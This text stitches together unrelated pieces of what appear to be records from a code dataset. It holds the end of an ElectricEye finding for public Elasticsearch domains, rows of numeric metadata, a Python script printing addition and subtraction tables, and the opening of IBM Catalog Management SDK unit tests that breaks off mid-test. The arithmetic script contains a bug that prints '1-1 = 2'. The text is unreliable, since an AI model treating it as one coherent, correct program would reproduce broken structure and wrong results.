"Title": "[Elasticsearch.9] Elasticsearch Service domains should not be exposed to the public",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is not to the public due to using a VPC, Cognito, or any additional conditions within the resource policy.",
"Remediation": {
"Recommendation": {
"Text": "For information on protecting Domains with a Resource-based Policy refer to the Identity and Access Management in Amazon Elasticsearch Service section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-ac.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion
}
}
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
| 50.716186
| 514
| 0.475889
| 5,337
| 68,619
| 6.103054
| 0.078134
| 0.015842
| 0.023763
| 0.029043
| 0.906883
| 0.904673
| 0.903567
| 0.902769
| 0.897397
| 0.896383
| 0
| 0.053582
| 0.422041
| 68,619
| 1,353
| 515
| 50.716186
| 0.76772
| 0.030137
| 0
| 0.811437
| 0
| 0.032458
| 0.394867
| 0.051254
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007728
| false
| 0.007728
| 0.002318
| 0
| 0.011592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
273c29c64b4097e4e5beba39fb76750895e2985e
| 5,525
|
py
|
Python
|
tab/tab1.py
|
Mariaalice1/tabuada
|
acfa5c8ce07048d77f37a168818e80c7d77c208b
|
[
"MIT"
] | null | null | null |
tab/tab1.py
|
Mariaalice1/tabuada
|
acfa5c8ce07048d77f37a168818e80c7d77c208b
|
[
"MIT"
] | null | null | null |
tab/tab1.py
|
Mariaalice1/tabuada
|
acfa5c8ce07048d77f37a168818e80c7d77c208b
|
[
"MIT"
] | null | null | null |
#Soma
tabb = [1+1]
tab = [2+1]
tab_2 = [3+1]
tab_3 = [4+1]
tab_4 = [5+1]
tab_5 = [6+1]
tab_6 = [7+1]
tab_7 = [8+1]
tab_8 = [9+1]
tab_9 = [10+1]
for y in tabb:
print("1+1 = {}".format(y))
for i in tab:
print("2+1 = {}".format(i))
for a in tab_2:
print("3+1 = {}".format(a))
for b in tab_3:
print("4+1 = {}".format(b))
for c in tab_4:
print("5+1 = {}".format(c))
for d in tab_5:
print("6+1 = {}".format(d))
for e in tab_6:
print("7+1 = {}".format(e))
for f in tab_7:
print("8+1 = {}".format(f))
for g in tab_8:
print("9+1 = {}".format(g))
for h in tab_9:
print("10+1 = {}".format(h))
print ("----------------------------------------------")
tab_1 = [1+2]
tab_2 = [2+2]
tab_3 = [3+2]
tab_4 = [4+2]
tab_5 = [5+2]
tab_6 = [6+2]
tab_7 = [7+2]
tab_8 = [8+2]
tab_9 = [9+2]
tab_10 = [10+2]
for y in tab_1:
print("1+2 = {}".format(y))
for i in tab_2:
print("2+2 = {}".format(i))
for a in tab_3:
print("3+2 = {}".format(a))
for b in tab_4:
print("4+2 = {}".format(b))
for c in tab_5:
print("5+2 = {}".format(c))
for d in tab_6:
print("6+2 = {}".format(d))
for e in tab_7:
print("7+2 = {}".format(e))
for f in tab_8:
print("8+2 = {}".format(f))
for g in tab_9:
print("9+2 = {}".format(g))
for h in tab_10:
print("10+2 = {}".format(h))
print ("----------------------------------------------")
tab_1 = [1+3]
tab_2 = [2+3]
tab_3 = [3+3]
tab_4 = [4+3]
tab_5 = [5+3]
tab_6 = [6+3]
tab_7 = [7+3]
tab_8 = [8+3]
tab_9 = [9+3]
tab_10 = [10+3]
for y in tab_1:
print("1+3 = {}".format(y))
for i in tab_2:
print("2+3 = {}".format(i))
for a in tab_3:
print("3+3 = {}".format(a))
for b in tab_4:
print("4+3 = {}".format(b))
for c in tab_5:
print("5+3 = {}".format(c))
for d in tab_6:
print("6+3 = {}".format(d))
for e in tab_7:
print("7+3 = {}".format(e))
for f in tab_8:
print("8+3 = {}".format(f))
for g in tab_9:
print("9+3 = {}".format(g))
for h in tab_10:
print("10+3 = {}".format(h))
print ("----------------------------------------------")
tab_1 = [1+4]
tab_2 = [2+4]
tab_3 = [3+4]
tab_4 = [4+4]
tab_5 = [5+4]
tab_6 = [6+4]
tab_7 = [7+4]
tab_8 = [8+4]
tab_9 = [9+4]
tab_10 = [10+4]
for y in tab_1:
print("1+4 = {}".format(y))
for i in tab_2:
print("2+4 = {}".format(i))
for a in tab_3:
print("3+4 = {}".format(a))
for b in tab_4:
print("4+4 = {}".format(b))
for c in tab_5:
print("5+4 = {}".format(c))
for d in tab_6:
print("6+4 = {}".format(d))
for e in tab_7:
print("7+4 = {}".format(e))
for f in tab_8:
print("8+4 = {}".format(f))
for g in tab_9:
print("9+4 = {}".format(g))
for h in tab_10:
print("10+4 = {}".format(h))
print ("----------------------------------------------")
#Subtracao
tab = [2-1]
tab_2 = [3-1]
tab_3 = [4-1]
tab_4 = [5-1]
tab_5 = [6-1]
tab_6 = [7-1]
tab_7 = [8-1]
tab_8 = [9-1]
tab_9 = [10-1]
for y in tabb:
print("1-1 = {}".format(y))
for i in tab:
print("2-1 = {}".format(i))
for a in tab_2:
print("3-1 = {}".format(a))
for b in tab_3:
print("4-1 = {}".format(b))
for c in tab_4:
print("5-1 = {}".format(c))
for d in tab_5:
print("6-1 = {}".format(d))
for e in tab_6:
print("7-1 = {}".format(e))
for f in tab_7:
print("8-1 = {}".format(f))
for g in tab_8:
print("9-1 = {}".format(g))
for h in tab_9:
print("10-1 = {}".format(h))
print ("----------------------------------------------")
tab_1 = [1-2]
tab_2 = [2-2]
tab_3 = [3-2]
tab_4 = [4-2]
tab_5 = [5-2]
tab_6 = [6-2]
tab_7 = [7-2]
tab_8 = [8-2]
tab_9 = [9-2]
tab_10 = [10-2]
for y in tab_1:
print("1-2 = {}".format(y))
for i in tab_2:
print("2-2 = {}".format(i))
for a in tab_3:
print("3-2 = {}".format(a))
for b in tab_4:
print("4-2 = {}".format(b))
for c in tab_5:
print("5-2 = {}".format(c))
for d in tab_6:
print("6-2 = {}".format(d))
for e in tab_7:
print("7-2 = {}".format(e))
for f in tab_8:
print("8-2 = {}".format(f))
for g in tab_9:
print("9-2 = {}".format(g))
for h in tab_10:
print("10-2 = {}".format(h))
print ("----------------------------------------------")
tab_1 = [1-3]
tab_2 = [2-3]
tab_3 = [3-3]
tab_4 = [4-3]
tab_5 = [5-3]
tab_6 = [6-3]
tab_7 = [7-3]
tab_8 = [8-3]
tab_9 = [9-3]
tab_10 = [10-3]
for y in tab_1:
print("1-3 = {}".format(y))
for i in tab_2:
print("2-3 = {}".format(i))
for a in tab_3:
print("3-3 = {}".format(a))
for b in tab_4:
print("4-3 = {}".format(b))
for c in tab_5:
print("5-3 = {}".format(c))
for d in tab_6:
print("6-3 = {}".format(d))
for e in tab_7:
print("7-3 = {}".format(e))
for f in tab_8:
print("8-3 = {}".format(f))
for g in tab_9:
print("9-3 = {}".format(g))
for h in tab_10:
print("10-3 = {}".format(h))
print ("----------------------------------------------")
tab_1 = [1-4]
tab_2 = [2-4]
tab_3 = [3-4]
tab_4 = [4-4]
tab_5 = [5-4]
tab_6 = [6-4]
tab_7 = [7-4]
tab_8 = [8-4]
tab_9 = [9-4]
tab_10 = [10-4]
for y in tab_1:
print("1-4 = {}".format(y))
for i in tab_2:
print("2-4 = {}".format(i))
for a in tab_3:
print("3-4 = {}".format(a))
for b in tab_4:
print("4-4 = {}".format(b))
for c in tab_5:
print("5-4 = {}".format(c))
for d in tab_6:
print("6-4 = {}".format(d))
for e in tab_7:
print("7-4 = {}".format(e))
for f in tab_8:
print("8-4 = {}".format(f))
for g in tab_9:
print("9-4 = {}".format(g))
for h in tab_10:
print("10-4 = {}".format(h))
print ("---------------------- Fim ------------------------")
| 20.92803
| 65
| 0.475294
| 1,120
| 5,525
| 2.208929
| 0.025893
| 0.157639
| 0.019402
| 0.03557
| 0.991108
| 0.991108
| 0.991108
| 0.991108
| 0.991108
| 0.991108
| 0
| 0.115706
| 0.220995
| 5,525
| 264
| 65
| 20.92803
| 0.459108
| 0.002353
| 0
| 0.352227
| 0
| 0
| 0.185266
| 0.066776
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.356275
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
27885e6257246f018fdf1b7e5d1d1ae44fba5709
| 505,670
|
py
|
Python
|
test/unit/test_catalog_management_v1.py
|
JonahFarc/platform-services-python-sdk
|
f5cee0d629ce81048680e19c81cea8448ecab217
|
[
"Apache-2.0"
] | 10
|
2020-04-02T15:48:33.000Z
|
2021-06-23T05:12:49.000Z
|
test/unit/test_catalog_management_v1.py
|
JonahFarc/platform-services-python-sdk
|
f5cee0d629ce81048680e19c81cea8448ecab217
|
[
"Apache-2.0"
] | 151
|
2020-03-30T20:24:39.000Z
|
2022-03-30T16:51:22.000Z
|
test/unit/test_catalog_management_v1.py
|
JonahFarc/platform-services-python-sdk
|
f5cee0d629ce81048680e19c81cea8448ecab217
|
[
"Apache-2.0"
] | 25
|
2020-04-16T21:03:19.000Z
|
2021-12-13T19:37:39.000Z
|
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2021.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit Tests for CatalogManagementV1
"""
from datetime import datetime, timezone
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
from ibm_cloud_sdk_core.utils import datetime_to_string, string_to_datetime
import inspect
import json
import pytest
import re
import requests
import responses
import urllib
from ibm_platform_services.catalog_management_v1 import *
_service = CatalogManagementV1(
authenticator=NoAuthAuthenticator()
)
_base_url = 'https://cm.globalcatalog.cloud.ibm.com/api/v1-beta'
_service.set_service_url(_base_url)
##############################################################################
# Start of Service: Account
##############################################################################
# region
class TestGetCatalogAccount():
"""
Test Class for get_catalog_account
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_catalog_account_all_params(self):
"""
get_catalog_account()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogaccount')
mock_response = '{"id": "id", "hide_IBM_cloud_catalog": true, "account_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = _service.get_catalog_account()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
class TestUpdateCatalogAccount():
"""
Test Class for update_catalog_account
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_update_catalog_account_all_params(self):
"""
update_catalog_account()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogaccount')
responses.add(responses.PUT,
url,
status=200)
# Construct a dict representation of a FilterTerms model
filter_terms_model = {}
filter_terms_model['filter_terms'] = ['testString']
# Construct a dict representation of a CategoryFilter model
category_filter_model = {}
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
# Construct a dict representation of a IDFilter model
id_filter_model = {}
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
# Construct a dict representation of a Filters model
filters_model = {}
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
# Set up parameter values
id = 'testString'
hide_ibm_cloud_catalog = True
account_filters = filters_model
# Invoke method
response = _service.update_catalog_account(
id=id,
hide_ibm_cloud_catalog=hide_ibm_cloud_catalog,
account_filters=account_filters,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['hide_IBM_cloud_catalog'] == True
assert req_body['account_filters'] == filters_model
@responses.activate
def test_update_catalog_account_required_params(self):
"""
test_update_catalog_account_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogaccount')
responses.add(responses.PUT,
url,
status=200)
# Invoke method
response = _service.update_catalog_account()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
class TestGetCatalogAccountAudit():
"""
Test Class for get_catalog_account_audit
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_catalog_account_audit_all_params(self):
"""
get_catalog_account_audit()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogaccount/audit')
mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = _service.get_catalog_account_audit()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
class TestGetCatalogAccountFilters():
"""
Test Class for get_catalog_account_filters
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_catalog_account_filters_all_params(self):
"""
get_catalog_account_filters()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogaccount/filters')
mock_response = '{"account_filters": [{"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}], "catalog_filters": [{"catalog": {"id": "id", "name": "name"}, "filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog = 'testString'
# Invoke method
response = _service.get_catalog_account_filters(
catalog=catalog,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'catalog={}'.format(catalog) in query_string
@responses.activate
def test_get_catalog_account_filters_required_params(self):
"""
test_get_catalog_account_filters_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogaccount/filters')
mock_response = '{"account_filters": [{"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}], "catalog_filters": [{"catalog": {"id": "id", "name": "name"}, "filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = _service.get_catalog_account_filters()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# endregion
##############################################################################
# End of Service: Account
##############################################################################
##############################################################################
# Start of Service: Catalogs
##############################################################################
# region
class TestListCatalogs():
"""
Test Class for list_catalogs
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_list_catalogs_all_params(self):
"""
list_catalogs()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs')
mock_response = '{"total_count": 11, "resources": [{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = _service.list_catalogs()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
class TestCreateCatalog():
"""
Test Class for create_catalog
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_create_catalog_all_params(self):
"""
create_catalog()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs')
mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Construct a dict representation of a Feature model
feature_model = {}
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
# Construct a dict representation of a FilterTerms model
filter_terms_model = {}
filter_terms_model['filter_terms'] = ['testString']
# Construct a dict representation of a CategoryFilter model
category_filter_model = {}
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
# Construct a dict representation of a IDFilter model
id_filter_model = {}
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
# Construct a dict representation of a Filters model
filters_model = {}
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
# Construct a dict representation of a SyndicationCluster model
syndication_cluster_model = {}
syndication_cluster_model['region'] = 'testString'
syndication_cluster_model['id'] = 'testString'
syndication_cluster_model['name'] = 'testString'
syndication_cluster_model['resource_group_name'] = 'testString'
syndication_cluster_model['type'] = 'testString'
syndication_cluster_model['namespaces'] = ['testString']
syndication_cluster_model['all_namespaces'] = True
# Construct a dict representation of a SyndicationHistory model
syndication_history_model = {}
syndication_history_model['namespaces'] = ['testString']
syndication_history_model['clusters'] = [syndication_cluster_model]
syndication_history_model['last_run'] = "2019-01-01T12:00:00Z"
# Construct a dict representation of a SyndicationAuthorization model
syndication_authorization_model = {}
syndication_authorization_model['token'] = 'testString'
syndication_authorization_model['last_run'] = "2019-01-01T12:00:00Z"
# Construct a dict representation of a SyndicationResource model
syndication_resource_model = {}
syndication_resource_model['remove_related_components'] = True
syndication_resource_model['clusters'] = [syndication_cluster_model]
syndication_resource_model['history'] = syndication_history_model
syndication_resource_model['authorization'] = syndication_authorization_model
# Set up parameter values
id = 'testString'
rev = 'testString'
label = 'testString'
short_description = 'testString'
catalog_icon_url = 'testString'
tags = ['testString']
features = [feature_model]
disabled = True
resource_group_id = 'testString'
owning_account = 'testString'
catalog_filters = filters_model
syndication_settings = syndication_resource_model
kind = 'testString'
# Invoke method
response = _service.create_catalog(
id=id,
rev=rev,
label=label,
short_description=short_description,
catalog_icon_url=catalog_icon_url,
tags=tags,
features=features,
disabled=disabled,
resource_group_id=resource_group_id,
owning_account=owning_account,
catalog_filters=catalog_filters,
syndication_settings=syndication_settings,
kind=kind,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['short_description'] == 'testString'
assert req_body['catalog_icon_url'] == 'testString'
assert req_body['tags'] == ['testString']
assert req_body['features'] == [feature_model]
assert req_body['disabled'] == True
assert req_body['resource_group_id'] == 'testString'
assert req_body['owning_account'] == 'testString'
assert req_body['catalog_filters'] == filters_model
assert req_body['syndication_settings'] == syndication_resource_model
assert req_body['kind'] == 'testString'
@responses.activate
def test_create_catalog_required_params(self):
"""
test_create_catalog_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs')
mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Invoke method
response = _service.create_catalog()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
class TestGetCatalog():
"""
Test Class for get_catalog
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_catalog_all_params(self):
"""
get_catalog()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString')
mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.get_catalog(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_catalog_value_error(self):
"""
test_get_catalog_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString')
mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_catalog(**req_copy)
class TestReplaceCatalog():
"""
Test Class for replace_catalog
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_replace_catalog_all_params(self):
"""
replace_catalog()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString')
mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Construct a dict representation of a Feature model
feature_model = {}
